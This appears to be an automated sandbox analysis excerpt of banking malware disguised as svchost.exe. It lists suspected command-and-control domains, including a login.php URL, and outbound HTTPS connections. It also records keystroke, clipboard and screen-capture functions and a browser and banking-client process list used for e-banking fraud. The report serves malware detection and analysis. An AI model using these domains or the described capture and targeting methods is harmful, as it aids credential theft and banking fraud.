    Source: svchost.exe, 00000002.00000003.1701184626.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1686468624.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1464966899.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687334531.0000000003A2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://puzylyp.com/
    Source: svchost.exe, 00000002.00000002.2648621076.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1445129038.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2572250638.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2666485485.00000000061CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1447072147.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1464966899.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653749079.000000000297F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2663634072.00000000060FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://qegyhig.com/
    Source: svchost.exe, 00000002.00000002.2678998805.000000000B5DF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1725860840.000000000B471000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653865388.00000000029A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1445129038.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1686835363.0000000003D2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460509147.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1441699638.00000000060AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2664198427.000000000615D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2657962041.0000000003A23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1440699544.0000000006162000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1700188363.000000000B471000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1686786989.0000000003A89000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1526548460.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694707700.0000000003D2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681542395.0000000006120000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459723801.00000000060AD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677975921.0000000003A89000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2587992390.0000000003C33000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460237443.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1674430217.000000000611F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1715222767.0000000003A0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://qegyhig.com/login.php
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
    Source: unknownNetwork traffic detected: HTTP traffic on port 57741 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
    Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50112 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
    Source: unknownNetwork traffic detected: HTTP traffic on port 57738 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57738
    Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57741
    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49720 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 75.2.71.199:443 -> 192.168.2.8:49719 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49723 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49729 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49731 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:50111 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:50114 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:50115 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:50116 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:57741 version: TLS 1.2

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    barindex
    Contains functionality to capture and log keystrokes
    Source: C:\Windows\apppatch\svchost.exeCode function: [tab]2_2_02BC2F40
    Source: C:\Windows\apppatch\svchost.exeCode function: [del]2_2_02BC2F40
    Source: C:\Windows\apppatch\svchost.exeCode function: [del]2_2_02BC2F40
    Source: C:\Windows\apppatch\svchost.exeCode function: [ins]2_2_02BC2F40
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BC3220 memset,GlobalLock,GetCurrentThreadId,GetGUIThreadInfo,GetOpenClipboardWindow,GetActiveWindow,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GlobalUnlock,GlobalUnlock,2_2_02BC3220
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BB9530 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_02BB9530
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008D9530 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_008D9530
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_00889530 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard,6_2_00889530
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BD9530 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard,9_2_02BD9530
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BD54A0 Sleep,_snprintf,GetDesktopWindow,GetWindowDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateDIBSection,SelectObject,BitBlt,GetDesktopWindow,GetDC,GetProcessHeap,HeapAlloc,memset,GetDIBits,GetDIBits,ReleaseDC,2_2_02BD54A0
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BC2F40 memset,GetProcessHeap,HeapAlloc,memset,GetProcessHeap,HeapValidate,GetProcessHeap,HeapReAlloc,GetKeyboardState,ToAscii,2_2_02BC2F40

    E-Banking Fraud

    barindex
    Checks if browser processes are running
    Source: C:\Windows\apppatch\svchost.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex2_2_02BC78A0
    Source: C:\Windows\apppatch\svchost.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex2_2_02BC78A0
    Source: C:\Windows\apppatch\svchost.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex2_2_02BC78A0
    Source: C:\Windows\apppatch\svchost.exeCode function: IsUserAnAdmin,SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe2_2_02BC6CA0
    Source: C:\Windows\apppatch\svchost.exeCode function: IsUserAnAdmin,SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe2_2_02BC6CA0
    Source: C:\Windows\apppatch\svchost.exeCode function: IsUserAnAdmin,SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe2_2_02BC6CA0
    Source: C:\Windows\apppatch\svchost.exeCode function: IsUserAnAdmin,SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe2_2_02BC6CA0
    Source: C:\Windows\apppatch\svchost.exeCode function: IsUserAnAdmin,SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe2_2_02BC6CA0
    Source: C:\Windows\apppatch\svchost.exeCode function: IsUserAnAdmin,SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe2_2_02BC6CA0
    Source: C:\Windows\apppatch\svchost.exeCode function: GetCommandLineA,StrStrIA,memset,IsUserAnAdmin,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe2_2_02BC1900
    Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex2_2_02BB3610
    Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex2_2_02BB3610
    Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex2_2_02BB3610
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex5_2_008E78A0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex5_2_008E78A0
